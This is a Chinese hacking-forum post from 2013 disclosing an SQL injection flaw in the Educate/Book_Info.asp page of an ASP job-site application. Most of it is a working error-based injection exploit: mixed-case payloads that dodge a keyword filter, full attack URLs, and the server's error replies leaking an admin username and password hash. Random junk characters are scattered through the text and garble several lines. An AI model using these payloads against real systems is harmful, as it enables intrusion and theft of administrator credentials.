漏洞出现在Educate/Book_Info.asp! {& V" K+ e" P" P5 k7 v
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
& O- b9 e* \- h# r- \' `4 W8 Iexp:如下4 J" ?+ N9 C* C H5 D- g% k; q
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
: m8 D# P. i& d% Y6 f4 j" V查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)/ k/ N4 p) n5 P- p* y- [# f
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)9 R7 ]" w# x$ e, N: t5 S' S
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'+ c' Z5 D: D! b5 a: {* r# b
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
* v3 w6 z2 ~. [" y' G# P( B7 X/Educate/Book_Info.asp,行 8% }7 I! l* `4 x+ _ ]
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
7 P2 T6 v' ]9 pMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
) e$ `& A" ?% x( F! u# ~4 x r; S将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
1 g/ N1 M* P+ {/Educate/Book_Info.asp,行 8 |
发表于 2013-2-13 23:56:06
收藏
支持
反对